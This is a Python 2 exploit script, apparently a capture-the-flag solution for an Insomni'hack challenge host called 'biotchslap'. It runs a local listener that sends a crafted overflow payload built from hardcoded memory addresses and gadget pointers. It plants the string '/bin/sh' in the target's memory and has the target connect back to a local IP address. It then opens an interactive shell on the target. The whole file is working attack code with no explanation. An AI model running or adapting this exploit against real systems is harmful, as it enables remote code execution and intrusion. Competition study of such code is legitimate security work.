import socket
from codez import *
from threading import Thread
pt='AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA'

def handle_server():
    s =socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('0.0.0.0',1070))
    s.listen(5)
    print 'asdf'
    sin,_ = s.accept()
    #sin.recv(1024)
    sin.sendall('1024'.ljust(4,"\x00"))
    p = 'A'*40 + pack('QQ',0x496640-0x8c,0x422D20 )
    p += 'B'*64 + pack('QQ',0x496640-0x30,0x04501d4)
    p += (pack('Q',0x4177FC)*4+"\x00"*8 + 'E'*16 + pack('Q',0)).ljust(200,'r')
    p +=  pack('QQ', 0x4261ac,0x4931E0)
#    p += pack('Q',0x4239c0)

    sin.send(p.ljust(1024,'x'))
###
### 0x000000000043dd48

r = Remote('biotchslap.insomni.hack',1070)
#r = xlocal()
#dbg()
t = Thread(target=handle_server,args=())
t.start()
r.read(':')
r.write((pack('QQ',0xdd,0x496640+8*2)+"/bin/sh").ljust(31,"\x00"))
r.read('?')
r.read(':')
r.write('192.168.204.101\n'.ljust(16,"\x00"))
#r.write('127.0.0.1\n'.ljust(16,"\x00"))

print r.read('?')
r.write('0000')
r.interactive()
t.join()